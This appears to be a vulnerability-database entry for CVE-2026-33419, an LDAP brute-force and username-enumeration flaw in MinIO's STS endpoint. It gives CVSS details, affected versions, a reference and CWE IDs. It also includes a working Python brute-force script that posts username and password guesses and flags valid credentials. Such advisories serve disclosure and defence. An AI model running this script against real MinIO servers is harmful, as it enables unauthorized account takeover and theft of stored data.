Security Vulnerability Report
CVE-2026-33419 CVSS 7.5 HIGH


Published: 2026-03-24 20:16:30
Last Modified: 2026-04-08 19:00:39

Description

MinIO is a high-performance object storage system. Prior to RELEASE.2026-03-17T21-25-16Z, MinIO AIStor's STS (Security Token Service) AssumeRoleWithLDAPIdentity endpoint is vulnerable to LDAP credential brute-forcing due to two combined weaknesses: (1) distinguishable error responses that enable username enumeration, and (2) absence of rate limiting on authentication attempts. An unauthenticated network attacker can enumerate valid LDAP usernames and then perform unlimited password guessing to obtain temporary AWS-style STS credentials, gaining access to the victim's S3 buckets and objects. This issue has been patched in RELEASE.2026-03-17T21-25-16Z.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - VULNERABLE
MinIO < RELEASE.2026-03-17T21-25-16Z

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# Target configuration
target_url = "https://<minio-server>/minio/sts/AssumeRoleWithLDAPIdentity"
ldap_user_base = "admin"
password_file = "passwords.txt"

# Headers
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def brute_force(username, password):
    payload = {
        "Action": "AssumeRoleWithLDAPIdentity",
        "Version": "2011-06-15",
        "LDAPUsername": username,
        "LDAPPassword": password
    }
    try:
        response = requests.post(target_url, data=payload, headers=headers, timeout=5)
        # Check for successful credential usage (usually HTTP 200 and specific XML structure)
        if response.status_code == 200 and "AssumeRoleWithLDAPIdentityResult" in response.text:
            print(f"[+] Success! Username: {username}, Password: {password}")
            print(response.text)
            return True
        # Check for username enumeration patterns (e.g., specific error messages in response)
        # Note: Specific error parsing depends on MinIO version and response format
        elif "User does not exist" in response.text:
            print(f"[-] User not found: {username}")
            return False
        else:
            print(f"[*] Failed attempt: {username}:{password}")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

# Example usage loop
# with open(password_file, 'r') as f:
#     for pwd in f:
#         brute_force(ldap_user_base, pwd.strip())

References

https://github.com/minio/minio/security/advisories/GHSA-jv87-32hw-hh99 (Patch, Vendor Advisory)

Weaknesses

CWE-204
CWE-307

Additional Record Details

Status
Analyzed
CVSS 3.1 (Primary)
Exploitability Score 3.9, Impact Score 3.6
CVSS 4.0 (Secondary)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Base Score 9.1, Severity CRITICAL